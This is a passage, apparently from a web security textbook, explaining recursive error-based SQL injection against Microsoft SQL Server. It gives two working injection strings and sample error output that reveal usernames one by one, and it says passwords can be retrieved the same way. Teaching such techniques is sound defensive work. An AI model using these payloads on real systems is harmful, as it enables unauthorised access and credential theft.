There are other ways of causing the database to attempt to convert a

Using Recursion

Suppose that you wish to extract all of the usernames and passwords in the

users

table. Using the previous extraction technique, you can obtain only a

single item of string data at a time. One way to circumvent this restriction is to

craft a query that takes the previous result as its input and returns the next

result as its output. Issuing these queries recursively will enable you to cycle

through each of the items of data which you wish to extract.

For example, supplying the following input returns an error message con-

taining the username that appears alphabetically first in the 

users

table:

‘ or 1 in (select min(username) from users where username > ‘a’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘aaron’ to a column of data type int.

Having established the username 

aaron

, you can insert this into the next

query as follows:

‘ or 1 in (select min(username) from users where username > ‘aaron’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘abbey’ to a column of data type int.

You can continue this process recursively until no further usernames are

returned. Having saved a list of these usernames, you can then use them to

retrieve the corresponding passwords directly, as in the earlier example.

T I P

Download 5,76 Mb.

Do'stlaringiz bilan baham: